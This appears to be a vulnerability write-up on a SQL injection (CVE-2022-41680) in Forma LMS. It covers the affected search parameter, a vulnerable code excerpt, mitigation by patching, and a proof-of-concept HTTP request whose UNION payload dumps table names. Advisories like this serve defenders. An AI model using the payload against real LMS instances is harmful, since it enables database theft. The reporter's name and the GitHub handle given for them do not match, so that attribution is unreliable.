CVE-2022-41680: Forma LMS 3.1. and Earlier Versions Vulnerable to SQL Injection

Forma LMS is a popular, open-source Learning Management System (LMS) that has been widely used by many organizations to manage and deliver e-learning courses. Recently, a serious security vulnerability has been discovered in version 3.1. and earlier of Forma LMS. This vulnerability, assigned the CVE identifier CVE-2022-41680, is a SQL injection vulnerability that could potentially enable an authenticated attacker (with a "student" role) to dump the entire database. This blog post will provide an overview of the exploit details, the vulnerable code, and original references for this vulnerability.

Exploit Details

In the affected versions of Forma LMS, the 'search[value]' parameter in the "appLms/ajax.server.php?r=mycertificate/getMyCertificates" function is vulnerable to SQL injection.
An attacker with the role of a student could potentially exploit this vulnerability to dump the entire database, resulting in a potential breach of sensitive information.

Vulnerable Code Snippet

The affected code snippet is part of the "search[value]" parameter in the "getMyCertificates()" function.

In "appLms/ajax.server.php", the vulnerable function "getMyCertificates()" is defined as follows

function getMyCertificates()
{
    ...
    $filter_text = Get::req('search[value]', DOTY_STRING, '');
    ...
    $iso_certificate_user->addSearchFilter($filter_text);
    ...
    $results = $iso_certificate_user->findAll();
    ...
}

In this code snippet, the user-supplied input from the "search[value]" parameter is retrieved using the "Get::req()" function and stored in the variable "$filter_text." This value is then passed to the "addSearchFilter()" method, which is part of the "iso_certificate_user" object, without any proper input validation or sanitization. As a result, an attacker could potentially inject malicious SQL queries to manipulate or dump the data in the database.

Proof of Concept

Assuming that an attacker has access to a Forma LMS instance with a student role, the attacker could exploit this SQL injection vulnerability using the following HTTP request:

POST /appLms/ajax.server.php?r=mycertificate/getMyCertificates HTTP/1.1
Host: vulnerable-forma-lms.example.com
Content-Type: application/x-www-form-urlencoded

search[value]=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,group_concat(table_name) from information_schema.tables WHERE table_schema=database()-- -

This HTTP request includes an SQL injection payload, which will execute the SQL query in the "search[value]" parameter to dump all table names from the current database.

Original References

The vulnerability was initially reported by Andrea Cardaci (GitHub: @carlobeltrame) on the Forma LMS GitHub repository:

- Issue: https://github.com/formalms/forma.lms/issues/235
- Patch: https://github.com/formalms/forma.lms/commit/9f116119ee573752b3465d5c8d1d9ac3dffa07b7

The official Forma LMS security announcement can be found here

- https://www.formalms.org/security-announcements/571-cve-2022-41680-sql-injection-vulnerability.html

Mitigation

To mitigate the vulnerability, users are advised to update their Forma LMS installations to version 3.1.1 or later, as it includes the necessary patches to address the SQL injection vulnerability. If updating is not feasible, users should apply the patch available on the GitHub repository to their Forma LMS installations to secure their systems from potential attacks.

Conclusion

SQL injection vulnerabilities in web applications, like the one discovered in Forma LMS, are dangerous and can lead to unauthorized access and disclosure of sensitive information. Keeping software up to date and applying security patches promptly is crucial to ensure the security of web applications. Forma LMS users are encouraged to take immediate action to mitigate the risk posed by the CVE-2022-41680 vulnerability.

Timeline

Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/01/2022 20:06:00 UTC